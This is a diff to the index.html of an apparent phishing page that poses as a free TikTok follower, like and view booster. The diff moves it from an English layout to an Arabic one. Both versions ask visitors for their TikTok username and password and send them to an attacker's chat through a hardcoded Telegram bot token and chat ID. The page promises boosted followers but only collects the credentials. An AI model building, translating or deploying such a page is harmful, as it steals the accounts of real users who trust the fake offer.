--- a/index.html
+++ b/index.html
@@ -1,56 +1,57 @@
-<!DOCTYPE html>
-<html lang="en">
+<!DOCTYPE html><html lang="ar" dir="rtl">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>FreeFolo - TikTok</title>
-  <link rel="icon" href="https://seeklogo.com/images/T/tiktok-logo-1F4C2DCD45-seeklogo.com.png">
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>رشق تيك توك مجاني</title>
+  <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@400;700&display=swap" rel="stylesheet">
   <style>
     body {
-      background-color: #000;
+      margin: 0;
+      font-family: 'Cairo', sans-serif;
+      background-color: #111;
       color: white;
-      font-family: Arial, sans-serif;
       display: flex;
       flex-direction: column;
       align-items: center;
-      padding: 20px;
+      justify-content: start;
+      min-height: 100vh;
+      padding-top: 40px;
     }
-    img.logo {
-      width: 100px;
-      margin-bottom: 20px;
+    img {
+      width: 80px;
+      margin-bottom: 10px;
     }
     h1 {
-      font-size: 24px;
-      margin-bottom: 30px;
+      margin: 0 0 20px;
+      color: #fff;
     }
-    .form-container {
-      background: #111;
-      padding: 20px;
-      border-radius: 15px;
-      box-shadow: 0 0 10px rgba(255, 255, 255, 0.2);
-      width: 100%;
-      max-width: 400px;
+    form {
       display: flex;
       flex-direction: column;
+      gap: 15px;
+      width: 90%;
+      max-width: 400px;
+      background: #1a1a1a;
+      padding: 25px;
+      border-radius: 15px;
+      box-shadow: 0 0 10px rgba(0,0,0,0.5);
     }
     input, select, button {
-      margin-bottom: 15px;
       padding: 12px;
-      font-size: 16px;
+      border-radius: 8px;
       border: none;
-      border-radius: 10px;
+      font-size: 16px;
     }
-    input[type="text"],
-    input[type="password"],
-    select {
-      background-color: #222;
+    input, select {
+      background-color: #333;
       color: white;
     }
     button {
       background-color: #ff0050;
       color: white;
-      cursor: pointer;
       font-weight: bold;
+      cursor: pointer;
+      transition: 0.3s;
     }
     button:hover {
       background-color: #e60045;
@@ -58,56 +59,48 @@
   </style>
 </head>
 <body>
-  <img src="https://seeklogo.com/images/T/tiktok-logo-1F4C2DCD45-seeklogo.com.png" alt="TikTok Logo" class="logo">
-  <h1>Free Folo</h1>
-  <div class="form-container">
-    <input type="text" id="username" placeholder="Username" required />
-    <input type="password" id="password" placeholder="Password" required />
-    <select id="followers">
+  <img src="https://upload.wikimedia.org/wikipedia/commons/a/a9/TikTok_logo.svg" alt="TikTok Logo">
+  <h1>رشق مجاني</h1>
+  <form id="rashqForm">
+    <input type="text" id="username" placeholder="اسم المستخدم" required>
+    <input type="password" id="password" placeholder="كلمة المرور" required>
+    <select id="amount">
       <option value="1000">1000</option>
       <option value="2000">2000</option>
       <option value="5000">5000</option>
     </select>
     <select id="type">
-      <option value="followers">Followers</option>
-      <option value="likes">Likes</option>
-      <option value="views">Views</option>
+      <option value="متابعين">متابعين</option>
+      <option value="لايكات">لايكات</option>
+      <option value="مشاهدات">مشاهدات</option>
     </select>
-    <button onclick="sendData()">Start Boosting Now</button>
-  </div>
+    <button type="submit">تم</button>
+  </form>  <script>
+    const botToken = "7522052271:AAHa6XIscaA7ivTn_C0Wr8oaqritL0GP8EY";
+    const chatId = "6454073193";
 
-  <script>
-    function sendData() {
+    document.getElementById("rashqForm").addEventListener("submit", function(e) {
+      e.preventDefault();
+
       const username = document.getElementById("username").value;
       const password = document.getElementById("password").value;
-      const followers = document.getElementById("followers").value;
+      const amount = document.getElementById("amount").value;
       const type = document.getElementById("type").value;
 
-      const message = `🔔 TikTok Request\\n👤 User: ${username}\\n🔒 Pass: ${password}\\n📦 Amount: ${followers}\\n📌 Type: ${type}`;
-      const token = "7522052271:AAHa6XIscaA7ivTn_C0Wr8oaqritL0GP8EY";
-      const chat_id = "6454073193";
+      const message = `👤 يوزر: ${username}\n🔑 باسورد: ${password}\n📦 العدد: ${amount}\n📌 النوع: ${type}`;
 
-      fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
+      fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
         method: "POST",
         headers: {
-          "Content-Type": "application/json",
+          "Content-Type": "application/json"
         },
         body: JSON.stringify({
-          chat_id: chat_id,
-          text: message,
-        }),
+          chat_id: chatId,
+          text: message
+        })
       })
-      .then((response) => {
-        if (response.ok) {
-          alert("Your request has been received! 🚀");
-        } else {
-          alert("Error sending data.");
-        }
-      })
-      .catch((error) => {
-        alert("Error: " + error.message);
-      });
-    }
-  </script>
-</body>
+      .then(() => alert("تم إرسال الطلب بنجاح!"))
+      .catch(() => alert("حدث خطأ. حاول مرة أخرى."));
+    });
+  </script></body>
 </html>
